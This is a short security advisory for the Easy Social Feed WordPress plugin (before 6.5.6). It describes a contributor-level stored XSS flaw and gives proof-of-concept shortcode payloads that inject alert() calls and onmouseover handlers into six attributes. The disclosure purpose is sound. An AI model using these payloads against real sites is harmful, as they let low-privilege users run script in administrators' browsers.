Easy Social Feed < 6.5.6 - Contributor+ Stored XSS

Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admin

PoC

Attributes fb_appid and locale (fixed in 6.5.4): [efb_likebox fb_appid=‘1234"; alert(/fb_appid/); asd ="’ locale=‘1234"; alert(/locale/); asd ="’] Attribute animate_effect: [efb_likebox animate_effect=‘1234" onmouseover=“alert(/animate_effect/)” style=“height: 50px; border-style: solid” "’] Attribute fanpage_url: [efb_likebox fanpage_url=‘http://example.com/awesome/page/" onmouseover=alert(“fanpage_url”) style=“height: 50px; border-style: solid” "’] Attribute box_width: [efb_likebox box_width=‘1234" onmouseover=“alert(/box_width/)” style=“height: 50px; border-style: solid” "’] Attribute box_height: [efb_likebox box_height=‘1234" onmouseover=“alert(/box_height/)” style=“height: 50px; border-style: solid” "’]